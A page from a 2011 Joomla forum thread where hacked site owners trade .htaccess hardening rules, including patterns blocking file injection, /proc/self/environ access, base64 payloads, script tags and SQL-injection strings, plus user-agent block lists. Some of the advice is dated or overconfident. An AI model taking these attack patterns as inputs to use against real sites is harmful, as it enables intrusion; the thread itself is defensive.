The Joomla! Forum ™

Download

Demo


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 2 of 2
  [ 40 posts ]  Go to page Previous  1, 2
  Print view Previous topic | Next topic 
Author Message
kurchania
PostPosted: Wed Jan 05, 2011 7:22 am 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Mon Sep 21, 2009 6:56 am
Posts: 2065
Location: indore,india
hi Alex,
so here we find the biggest problem why someone hack your website.my previous post
Quote:
i am not convinced.if the file permission is 644 how can allow_url_fopen will hack the website?may be i miss something in server logs.

i miss mod_security.
now i am 100% convinced that yes its XSS attack.switch your hosting as soon as possible.also give this report to your hosting provider.
Regards
Abhijeet

_________________
abhijeet kurchania
The future depends on what you do today
Top
 Profile  
 
Alex-DED
PostPosted: Thu Jan 06, 2011 5:37 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Tue Dec 28, 2010 1:17 am
Posts: 20
Hi Abhijeet and Leolam,

thanks alot for all your comments!

@Leoloam: Do you mean with output the logfiles of mod_security?
I will contact Smart Telecom about the issue and hope that they proceed with the necessary steps. I asked a local colleague if we can make someting about the hacker (I know where he lives and on which university he was going, since he uses the same name for his Facebook Account like he named his Hack-Identity so it wouldn`t be a problem to find out his real name with little effort) but he said that the police won`t make anything about it. So I`m curious what will happen.

Unfortunately I don`t have a copy of the infected files anymore. I don`t store the password in Filezilla anymore, but before the hack, yes I have. Regarding the name rights: I will talk with my local colleague and ask him again about this issue (we contacted a new host in Jakarta before and they mailed us the procedure that it takes two month to switch the name rights because of a national regulation, further details later). Thanks again for all your input!

@Abhijeet:Can you simply integrate these code snippets :
SecFilter “<( |\n)*script"
SecFilter "<(.|\n)+>”
in the htaccess file? Do I have also to integrate this snippet:
SecFilterEngine On?
Are there another important snippets (e.g. SecFilterCheckURLEncoding On)?
Since I will do this in case mod_security is not enabled on my server. Thanks!
Do you mean mod_security leaves it`s traces in the raw log files and they are not existent in mine?

As soon as my host provides me with some info, I will write it here!

Could anyone confirm that PHP 5.3.3 and MySQL 5.5.8 the latest release versions for Apache?

Kind regards

Alex


Last edited by Alex-DED on Thu Jan 06, 2011 6:07 am, edited 1 time in total.

Top
 Profile  
 
kdminc
PostPosted: Thu Jan 06, 2011 5:51 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Apr 07, 2008 4:51 pm
Posts: 4
The hacker claims to be using a Joomla vulnerability, if you can believe him, I did locate a suspicious .configure.php in one of my sites roots and a folder labeled neo

I've been updating all my sites to the latest patch and have been chewing through logs, the hacker is using different ip addresses to access, not just with smart-telecom, I would be suprised if he's not freeloading off available wifi signals.

I'll be honest I know little about this and how to stop/prevent this from continuing until I switch hosts - I'm currently using GoDaddy for these sites and have been intending to move for a while now but their support response was pathetic so that move will become priority 1 now.

Any recommendations for good shared hosting or inexpensive vs hosts?

Oh yeah if you chat with this guy he keeps asking for money, basically saying he'll go away if you pay him off
Top
 Profile  
 
kurchania
PostPosted: Thu Jan 06, 2011 6:22 am 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Mon Sep 21, 2009 6:56 am
Posts: 2065
Location: indore,india
hello kdminc & Alex,
just replace your .htaccess file with this file.
http://www.sigsiu.net/presentations/for ... bsite.html
i am sure such kind of attack are not possible again.
that's what i can say now.
this htacess code will block all your attack by this line
Code:
# Deny access to php, xml and ini files
# within components and plugins directories
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_URI} \.php|\.ini|\.xml [NC]
RewriteCond %{REQUEST_URI} \/components\/ [OR]
RewriteCond %{REQUEST_URI} ^\/includes\/|^\/administrator\/includes\/ [OR]
RewriteCond %{REQUEST_URI} \/language\/ [OR]
RewriteCond %{REQUEST_URI} \/libraries\/ [OR]
RewriteCond %{REQUEST_URI} \/modules\/ [OR]
RewriteCond %{REQUEST_URI} \/plugins\/ [OR]
RewriteCond %{REQUEST_URI} \/templates\/ [OR]
RewriteCond %{REQUEST_URI} \/xmlrpc\/
RewriteRule ^(.*)$ index.php [R=404,L]
#### @RS


Regards
Abhijeet

_________________
abhijeet kurchania
The future depends on what you do today
Top
 Profile  
 
leolam
PostPosted: Thu Jan 06, 2011 6:54 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Aug 29, 2005 10:17 am
Posts: 12046
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
kdminc wrote:
The hacker claims to be using a Joomla vulnerability
Nonsense. He is using an unsecured account which had bad passwords or a bad hosting. goDaddy has had tons of hacks over the past few month's (elsewhere documented in the forum)
Quote:
I would be suprised if he's not freeloading off available wifi signals.
Not possible if you set up your wifi with WPA2-PSK with AES encryption
Quote:
if you chat with this guy he keeps asking for money, basically saying he'll go away if you pay him off
why on earth are you chatting with a hacker....you give him a hard-on by acknowledging him. Don't!

Leo 8)

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---


Last edited by ooffick on Sat Jan 08, 2011 9:14 pm, edited 2 times in total.
Mod Note: Removed self promotion. Please read the Forum rules for details.


Top
 Profile  
 
Alex-DED
PostPosted: Thu Jan 06, 2011 8:33 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Tue Dec 28, 2010 1:17 am
Posts: 20
Hi Abhijeet,

thanks for the code and link. I have integrated missing parts in my existing .htaccess file!
I post it below, maybe its useful for someone, I have merged several recommendations for htaccess files, mainly based on the Master File by Nicholas K. Dionysopoulos, Akeeba (I deleted some code from this file because my Website crashed because of it)
Private Data were replaced by "XXX"

Code:
##
# @version $Id: htaccess.txt 10492 2010-12-28, based on Master-htaccess by Nicholas K. Dionysopoulos, Akeeba
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################


########## Begin - RewriteEngine enabled
RewriteEngine On
########## End - RewriteEngine enabled


########## Begin - No directory listings
IndexIgnore *
Options +FollowSymLinks All -Indexes
########## End - No directory listings


########## Begin - Redirect non-www to www
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
########## End - Redirect non-www to www


########## Begin - File injection protection, by SigSiu.net
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]\=http:\/\/(.*)
RewriteRule ^(.*)$ - [R=404,L]
########## End - File injection protection


########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
# If the request contains /proc/self/environ (by SigSiu.net)
RewriteCond %{QUERY_STRING} proc\/self\/environ [OR]
# Legacy configuration variable injection
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode stuff to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script trying to base64_decode stuff to send via URL
RewriteCond %{QUERY_STRING} base64_decode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Instead of using 403, we'd better use 404 (Not Found) to confuse hackers
RewriteRule ^(.*)$ index.php [R=404,L]
########## End - Rewrite rules to block out some common exploits


########## Begin Deny access to php, xml and ini files
# within components and plugins directories
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_URI} \.php|\.ini|\.xml [NC]
RewriteCond %{REQUEST_URI} \/components\/ [OR]
RewriteCond %{REQUEST_URI} ^\/includes\/|^\/administrator\/includes\/ [OR]
RewriteCond %{REQUEST_URI} \/language\/ [OR]
RewriteCond %{REQUEST_URI} \/libraries\/ [OR]
RewriteCond %{REQUEST_URI} \/modules\/ [OR]
RewriteCond %{REQUEST_URI} \/plugins\/ [OR]
RewriteCond %{REQUEST_URI} \/templates\/ [OR]
RewriteCond %{REQUEST_URI} \/xmlrpc\/
RewriteRule ^(.*)$ index.php [R=404,L]
########## End Deny access to php, xml and ini files


########## Begin Prevent most common SQL-Injections
RewriteCond %{query_string} concat.*\( [NC,OR]
RewriteCond %{query_string} union.*select.*\( [NC,OR]
RewriteCond %{query_string} union.*all.*select [NC]
RewriteRule ^(.*)$ index.php [F,L]
########## End Prevent most common SQL-Injections


#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)
# RewriteBase /


########## Begin - Advanced server protection
# Advanced server protection - August 2010
# by Nicholas K. Dionysopoulos
## Disallow PHP Easter Eggs (can be used in fingerprinting attacks to determine
## your PHP version). See http://www.0php.com/php_easter_egg.php and
## http://osvdb.org/12184 for more information
RewriteCond %{QUERY_STRING} ^%3F=PHPE9568F36-D428-11d2-A769-00AA001ACF42 [OR]
RewriteCond %{QUERY_STRING} ^%3F=PHPE9568F34-D428-11d2-A769-00AA001ACF42 [OR]
RewriteCond %{QUERY_STRING} ^%3F=PHPE9568F35-D428-11d2-A769-00AA001ACF42 [OR]
RewriteCond %{QUERY_STRING} ^%3F=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 [NC]
RewriteRule ^(.*)$ - [F,L]

## Back-end protection
## This also blocks fingerprinting attacks browsing for XML and INI files
#RewriteRule ^(administrator[/]?)$ administrator/index.php [L]
#RewriteRule ^(administrator/index.htm[l]?)$ $1 [L]
#RewriteRule ^(administrator/index.php)$ $1 [L]
#RewriteRule ^(administrator/index[2,3].php)$ $1 [L]
#RewriteRule ^(administrator/(components|modules|templates|images|plugins)/.*\.(jpe[g,2]?|jpg|png|gif|bmp|css|js|swf|htm[l]?))$ $1 [L]
#RewriteRule ^administrator/(.*)$ - [R=404,L]

## Disallow front-end access for certain Joomla! system directories
RewriteRule ^(includes/js/.*)$ $1 [L]
RewriteRule ^(cache|includes|language|libraries|logs|tmp)/.*$ - [R=404,L]

## Allow limited access for certain Joomla! system directories with client-accessible content
RewriteRule ^((components|modules|plugins|templates)/.*\.(jp[g,2,eg]?|png|gif|bmp|css|ico|js|swf|htm[l]?))$ $1 [L]
RewriteRule ^((components|modules|plugins|templates)/.*index\.php(.*))$ $1 [L]
RewriteRule ^(templates/.*\.php)$ $1 [L]
RewriteRule ^(components|modules|plugins|templates)/.*$ - [R=404,L]

########## End - Advanced server protection


########## Begin - Basic antispam Filter, by SigSiu.net
## I removed some common words, tweak to your liking
RewriteCond %{query_string} \bviagra\b [NC,OR]
RewriteCond %{query_string} \bambien\b [NC,OR]
RewriteCond %{query_string} \bblue\spill\b [NC,OR]
RewriteCond %{query_string} \bcialis\b [NC,OR]
RewriteCond %{query_string} \bcocaine\b [NC,OR]
RewriteCond %{query_string} \bejaculation\b [NC,OR]
RewriteCond %{query_string} \berectile\b [NC,OR]
RewriteCond %{query_string} \berections\b [NC,OR]
RewriteCond %{query_string} \bhoodia\b [NC,OR]
RewriteCond %{query_string} \bhuronriveracres\b [NC,OR]
RewriteCond %{query_string} \bimpotence\b [NC,OR]
RewriteCond %{query_string} \blevitra\b [NC,OR]
RewriteCond %{query_string} \blibido\b [NC,OR]
RewriteCond %{query_string} \blipitor\b [NC,OR]
RewriteCond %{query_string} \bphentermin\b [NC,OR]
RewriteCond %{query_string} \bprosac\b [NC,OR]
RewriteCond %{query_string} \bsandyauer\b [NC,OR]
RewriteCond %{query_string} \btramadol\b [NC,OR]
RewriteCond %{query_string} \btroyhamby\b [NC,OR]
RewriteCond %{query_string} \bultram\b [NC,OR]
RewriteCond %{query_string} \bunicauca\b [NC,OR]
RewriteCond %{query_string} \bvalium\b [NC,OR]
RewriteCond %{query_string} \bviagra\b [NC,OR]
RewriteCond %{query_string} \bvicodin\b [NC,OR]
RewriteCond %{query_string} \bxanax\b [NC,OR]
RewriteCond %{query_string} \bypxaieo\b [NC]
RewriteRule ^(.*)$ - [R=404,L]
########## End - Basic antispam Filter, by SigSiu.net


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section


########## Begin - Common hacking tools and bandwidth hoggers block
## By SigSiu.net and @nikosdion.
## WARNING: This will also block old versions of JoomlaPack Remote
## and will disallow running CRON jobs using wget.
# The following rules are for common hacking tools:
SetEnvIf user-agent "Indy Library" stayout=1
SetEnvIf user-agent "libwww-perl" stayout=1
SetEnvIf user-agent "Wget" stayout=1
# The following rules are for bandwidth-hogging download tools
SetEnvIf user-agent "Download Demon" stayout=1
SetEnvIf user-agent "GetRight" stayout=1
SetEnvIf user-agent "GetWeb!" stayout=1
SetEnvIf user-agent "Go!Zilla" stayout=1
SetEnvIf user-agent "Go-Ahead-Got-It" stayout=1
SetEnvIf user-agent "GrabNet" stayout=1
SetEnvIf user-agent "TurnitinBot" stayout=1
# This line denies access to all of the above tools
deny from env=stayout
########## End - Common hacking tools and bandwidth higgers block


########## Begin - Block BadBots
SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "^ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker" bad_bot
SetEnvIfNoCase User-Agent "^NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "^Teleport" bad_bot
SetEnvIfNoCase User-Agent "^EmailCollector" bad_bot
SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
SetEnvIfNoCase User-Agent "^Zeus" bad_bot
SetEnvIfNoCase User-Agent "^Libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^DataCha0s/2.0" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.1" bad_bot
SetEnvIfNoCase User-Agent "^StackRambler/2.0" bad_bot

<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>
########## End - Block BadBots


Kind regards

Alex
Top
 Profile  
 
kdminc
PostPosted: Thu Jan 06, 2011 8:35 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Apr 07, 2008 4:51 pm
Posts: 4
Joomla's had numerous vulnerability's however I believe this was actually one in an old installation of Facile Forms

I've never gone anywhere populated where I couldn't find an unsecured wireless access point

I don't care if some script kiddie gets wood while I chat with him if it leads me to additional undetected vulnerabilities in my account.

Thanks for the recommendations for hosting LeoLam but I'm not sure I value your opinion/judgement based on what you've said so far

Kurchania, thank you for your efforts, I had already updated my .htaccess files during the cleanup process but will review your suggestions and likely integrate them, they are appreciated
Top
 Profile  
 
kurchania
PostPosted: Thu Jan 06, 2011 8:54 am 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Mon Sep 21, 2009 6:56 am
Posts: 2065
Location: indore,india
hi kdminc,
Quote:
Thanks for the recommendations for hosting LeoLam but I'm not sure I value your opinion/judgement based on what you've said so far

leo is suggesting this for Alex i guess beacuse Alex want to switch his hosting network.

@alex,
try to run the url that you find in your server logs to make sure that yes now you are secure and your .htacess work fine now.hit all the url that hacker attempt to crack your website.
anyways if you find any trouble we all are here.

you know guys at least you both know why your site is hacked my one site is hacked previously and still i am unable to find that reason. :D


Quote:
please close this topic now Alex

Regards
Abhijeet

_________________
abhijeet kurchania
The future depends on what you do today
Top
 Profile  
 
leolam
PostPosted: Thu Jan 06, 2011 10:16 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Aug 29, 2005 10:17 am
Posts: 12046
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
kdminc wrote:
Thanks for the recommendations for hosting LeoLam but I'm not sure I value your opinion/judgement based on what you've said so far
Well I am happy that over 6,000 clients and over 18,500 resolved professional support requests do value my and our support; otherwise my staff and my family would have little bread and butter..... (did you see the stickies in the beginning of this forum? ;-) )

BTW Joomla's vulnerabilities have always been addressed with the highest speed....Guess why we are on Joomla 1.5.22 of which the last 6 or 7 are actually only security releases. If you want to know about Vulnerable extensions please visit http://feeds.joomla.org/JoomlaSecurityV ... Extensions. Mentioning FF does make little sense since that product is dead for over 4 years. The VEL is actualized daily

But I have no further problems leaving you in the good hands of Abhijeet

I wish you all the best

Leo 8)

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---
Top
 Profile  
 
Alex-DED
PostPosted: Fri Jan 07, 2011 7:00 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Tue Dec 28, 2010 1:17 am
Posts: 20
Thanks to all who joined the thread, especially to Abhijeet and Leolam who helped me really a lot!! Thanks for your time and effort!!
@leolam: the link to the indonesian agency for internet names:
http://www.pandi.or.id/brief-guide-in-english/ (box on the top right where something with "30" is written)
It`s not two months but only one month you have to stick to your old host until you switch to the new one, sorry for the mistake (in my past post I meant that I registered the name with the host, not that they belong him, sorry for the unprecise statement)!

Kind regards

Alex
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 2 of 2
  [ 40 posts ]  Go to page Previous  1, 2


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Who is online

Users browsing this forum: No registered users and 28 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group